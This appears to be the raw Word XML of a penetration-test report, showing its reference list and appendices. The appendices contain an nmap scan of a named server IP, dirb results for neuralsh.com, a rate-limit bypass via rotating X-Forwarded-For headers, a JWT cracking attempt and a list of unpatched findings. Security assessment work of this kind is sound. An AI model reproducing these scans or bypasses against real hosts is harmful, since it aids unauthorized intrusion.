        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Bishop Fox. (2023). State of Offensive Security 2023: External Penetration Testing Trends. Bishop Fox Research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Bugcrowd. (2021). Subdomain Takeover: Fundamentals and Mitigation. Bugcrowd Blog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. CIS Controls. (2021). CIS Controls v8. Center for Internet Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. Fernandez, J., Tan, K., &amp; Lim, W. (2022). Vulnerability prevalence in Southeast Asian technology platforms: A black-box assessment study. Journal of Information Security and Applications, 65, 103091.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. First.org. (2019). CVSS v3.1 Specification Document. FIRST — Forum of Incident Response and Security Teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. Islam, R., Ahmed, T., &amp; Rahman, M. (2023). Database exposure in cloud-hosted web applications: A systematic study. IEEE Transactions on Information Forensics and Security, 18, 2145–2158.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7. Kaur, H., &amp; Singh, M. (2021). JWT security vulnerabilities in production APIs: An empirical study. International Journal of Network Security, 23(4), 612–621.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8. MikroTik. (2024). RouterOS Security Hardening Guide. MikroTik Documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9. NIST. (2008). Technical Guide to Information Security Testing and Assessment (SP 800-115). National Institute of Standards and Technology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10. OWASP Foundation. (2021). OWASP Web Security Testing Guide v4.2. OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>11. OWASP Foundation. (2021). OWASP Top Ten 2021. OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12. OWASP Foundation. (2023). CORS Cheat Sheet. OWASP Cheat Sheet Series.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>13. Penetration Testing Execution Standard (PTES). (2014). PTES Technical Guidelines. http://www.pentest-standard.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>14. RFC 7489. (2015). Domain-based Message Authentication, Reporting, and Conformance (DMARC). IETF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>15. Sheffer, Y., Hardt, D., &amp; Jones, M. (2020). JSON Web Token Best Current Practices (RFC 8725). IETF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16. Stuttard, D., &amp; Pinto, M. (2011). The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (2nd ed.). Wiley.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>17. Van den Berg, R. (2019). Bypassing rate limiting using HTTP header manipulation. DEF CON 27 Talk Proceedings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>18. Verizon. (2024). 2024 Data Breach Investigations Report. Verizon Business.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>APPENDICES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix A: Nmap Scan Output — Origin Server (103.16.62.217)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Nmap 7.94SVN scan — 2026-06-06</w:t>
        <w:br/>
        <w:t># Command: nmap -sV -p 22,25,53,80,110,111,143,443,465,587,993,995,2000,2083,2087,2096,3306,5060,8899,9001 103.16.62.217</w:t>
        <w:br/>
        <w:br/>
        <w:t>22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu</w:t>
        <w:br/>
        <w:t>25/tcp   open  smtp        Exim smtpd 4.99.2</w:t>
        <w:br/>
        <w:t>53/tcp   open  domain      PowerDNS Authoritative Server 4.9.2</w:t>
        <w:br/>
        <w:t>80/tcp   open  http        Apache httpd</w:t>
        <w:br/>
        <w:t>110/tcp  open  pop3        Dovecot pop3d</w:t>
        <w:br/>
        <w:t>111/tcp  open  rpcbind     2-4 (RPC #100000)</w:t>
        <w:br/>
        <w:t>143/tcp  open  imap        Dovecot imapd</w:t>
        <w:br/>
        <w:t>443/tcp  open  https       Apache httpd</w:t>
        <w:br/>
        <w:t>465/tcp  open  smtps       Exim (SSL)</w:t>
        <w:br/>
        <w:t>587/tcp  open  smtp        Exim (STARTTLS)</w:t>
        <w:br/>
        <w:t>993/tcp  open  imaps       Dovecot</w:t>
        <w:br/>
        <w:t>995/tcp  open  pop3s       Dovecot</w:t>
        <w:br/>
        <w:t>2083/tcp open  https       cPanel (SSL)</w:t>
        <w:br/>
        <w:t>2087/tcp open  https       WHM (Web Host Manager)</w:t>
        <w:br/>
        <w:t>2096/tcp open  https       cPanel Webmail</w:t>
        <w:br/>
        <w:t>3306/tcp open  mysql       MySQL 8.0.43</w:t>
        <w:br/>
        <w:t>5060/tcp open  sip</w:t>
        <w:br/>
        <w:t>8899/tcp open  http        (unknown)</w:t>
        <w:br/>
        <w:t>9001/tcp open  http        MikroTik RouterOS webfig</w:t>
        <w:br/>
        <w:br/>
        <w:t>Nmap done: 1 IP address (1 host up)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix B: Dirb Results — neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># DIRB v2.22 — 2026-06-06</w:t>
        <w:br/>
        <w:t># Target: https://neuralsh.com/</w:t>
        <w:br/>
        <w:br/>
        <w:t>---- Scanning URL: https://neuralsh.com/ ----</w:t>
        <w:br/>
        <w:t>+ https://neuralsh.com/About (CODE:200|SIZE:5242)</w:t>
        <w:br/>
        <w:t>+ https://neuralsh.com/about (CODE:200|SIZE:5242)</w:t>
        <w:br/>
        <w:t>+ https://neuralsh.com/favicon.ico (CODE:200|SIZE:15406)</w:t>
        <w:br/>
        <w:t>+ https://neuralsh.com/privacy (CODE:200|SIZE:4891)</w:t>
        <w:br/>
        <w:t>+ https://neuralsh.com/publication (CODE:200|SIZE:6234)</w:t>
        <w:br/>
        <w:t>+ https://neuralsh.com/robots.txt (CODE:200|SIZE:0)</w:t>
        <w:br/>
        <w:br/>
        <w:t>No sensitive administrative paths found behind Cloudflare WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix C: Rate Limit Bypass Test Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=== TEST 1: No bypass ===</w:t>
        <w:br/>
        <w:t>Request 1: HTTP 200</w:t>
        <w:br/>
        <w:t>Request 2: HTTP 200</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>Request 18: HTTP 200</w:t>
        <w:br/>
        <w:t>Request 19: HTTP 429  ← Rate limit triggered</w:t>
        <w:br/>
        <w:t>Requests 20-50: HTTP 429</w:t>
        <w:br/>
        <w:t>Result: 18/50 tokens before rate limit</w:t>
        <w:br/>
        <w:br/>
        <w:t>=== TEST 2: X-Forwarded-For bypass ===</w:t>
        <w:br/>
        <w:t>Request 1:  [XFF: 87.23.145.12]  HTTP 200</w:t>
        <w:br/>
        <w:t>Request 2:  [XFF: 192.34.67.89]  HTTP 200</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>Request 50: [XFF: 45.67.234.11]  HTTP 200</w:t>
        <w:br/>
        <w:t>Result: 50/50 tokens — rate limit never triggered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix D: JWT Token Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Token (example):</w:t>
        <w:br/>
        <w:t>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.</w:t>
        <w:br/>
        <w:t>eyJ0eXBlIjoiZ3Vlc3QiLCJ0aWQiOiI1NTBlO...</w:t>
        <w:br/>
        <w:br/>
        <w:t>Decoded Header:</w:t>
        <w:br/>
        <w:t>{"alg":"HS256","typ":"JWT"}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Decoded Payload:</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "type": "guest",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "tid": "550e8400-e29b-41d4-a716-446655440000",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "iat": 1749220800,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "exp": 1749222600</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Validity: 30 minutes from issuance</w:t>
        <w:br/>
        <w:t>Secret: Not cracked (rockyou.txt — 14,344,391 candidates exhausted)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix E: Follow-Up Verification Scan — 10 June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>New findings vs June 6 baseline:</w:t>
        <w:br/>
        <w:br/>
        <w:t>N-018: Port 2078 — HTTP 401 WWW-Authenticate: Basic realm="Restricted Area"</w:t>
        <w:br/>
        <w:t>N-018: Port 2091 — HTTP 401 WWW-Authenticate: Basic realm="Restricted Area"</w:t>
        <w:br/>
        <w:t>N-019: Port 25 — Changed from 'filtered' to 'open' (TCP connection accepted)</w:t>
        <w:br/>
        <w:t>N-020: Port 2077 → Redirects to https://www.onesala.com:2078/</w:t>
        <w:br/>
        <w:t>N-020: Port 2082 → Redirects to https://www.onesala.com:2083/</w:t>
        <w:br/>
        <w:br/>
        <w:t>Conclusion: All 17 original findings confirmed unpatched.</w:t>
        <w:br/>
        <w:t>3 new findings discovered. Total: 20 findings.</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line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="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auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Times New Roman" w:hAnsi="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